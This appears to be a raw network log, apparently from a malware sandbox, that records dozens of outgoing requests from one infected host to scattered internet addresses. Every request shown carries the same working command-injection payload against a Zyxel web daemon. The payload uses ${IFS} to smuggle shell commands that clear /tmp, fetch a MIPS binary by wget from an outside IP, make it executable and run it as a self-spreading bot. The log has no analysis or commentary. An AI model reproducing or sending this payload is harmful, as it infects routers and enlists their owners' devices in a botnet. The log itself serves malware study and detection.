                                                        Jan 28, 2024 10:13:10.745112896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8983192.168.2.144472439.54.145.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745131016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8984192.168.2.1452478183.228.166.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745167971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8985192.168.2.1451866164.188.56.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745193005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8986192.168.2.1449978222.34.146.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745269060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8987192.168.2.145240841.94.241.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745296001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8988192.168.2.1446352102.12.223.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745348930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8989192.168.2.144280068.197.176.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745382071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8990192.168.2.1435148168.109.65.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745419979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8991192.168.2.1441306192.157.145.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745450974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8992192.168.2.145924891.148.118.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745487928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8993192.168.2.1434468193.52.197.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745517015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8994192.168.2.144935466.160.231.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745568037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8995192.168.2.144956812.194.206.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745605946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8996192.168.2.1443310136.64.112.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745621920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8997192.168.2.14411429.178.65.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745655060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8998192.168.2.1438760199.188.104.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745697975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8999192.168.2.1436070143.44.201.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745748997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9000192.168.2.1447396145.9.90.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745771885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9001192.168.2.1437860129.110.45.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745815992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9002192.168.2.1435088208.130.207.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745846987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9003192.168.2.145677050.216.2.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745906115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9004192.168.2.1434700148.171.47.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745913029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9005192.168.2.145716648.183.207.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745951891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9006192.168.2.1453604179.227.38.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745997906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9007192.168.2.145626025.216.127.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746022940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9008192.168.2.1450884182.187.97.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746057987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9009192.168.2.1445606206.149.140.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746109009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9010192.168.2.143955420.234.133.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746166945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9011192.168.2.1454814162.94.122.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746181965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9012192.168.2.1460828120.13.239.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746225119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9013192.168.2.1447628190.90.57.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746270895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9014192.168.2.1457758104.95.217.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746320963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9015192.168.2.1457096182.239.75.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746351957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9016192.168.2.1450970153.20.188.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746402979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9017192.168.2.143388494.118.74.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746445894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9018192.168.2.1443892180.206.18.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746479988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9019192.168.2.1446914114.25.15.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746501923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9020192.168.2.1432866119.72.83.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746537924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9021192.168.2.1449424116.66.13.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746572971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9022192.168.2.1459628132.100.178.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746609926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9023192.168.2.145292296.89.162.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746639013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9024192.168.2.1436122219.183.220.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746681929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9025192.168.2.1432792223.24.43.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746712923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9026192.168.2.144105078.77.191.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746737957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9027192.168.2.1442404203.11.185.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746788025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9028192.168.2.1449478172.173.73.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746809959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9029192.168.2.1457968125.206.129.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746855974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9030192.168.2.1458048108.88.230.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746891022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9031192.168.2.1451872222.197.170.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746938944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9032192.168.2.1435006140.177.222.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.746968985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9033192.168.2.1449794114.190.215.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747021914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9034192.168.2.1445462159.3.179.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747081995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9035192.168.2.1457396137.122.213.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747111082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9036192.168.2.144314214.62.16.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747145891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9037192.168.2.145935850.128.179.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747173071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9038192.168.2.144894627.222.200.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747216940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9039192.168.2.1439952183.204.118.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747252941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9040192.168.2.145644696.162.162.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747308969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9041192.168.2.1438484211.48.8.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747344017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9042192.168.2.144358889.217.74.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747365952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9043192.168.2.144369484.218.236.113443
                                                        TimestampBytes transferredDirectionData
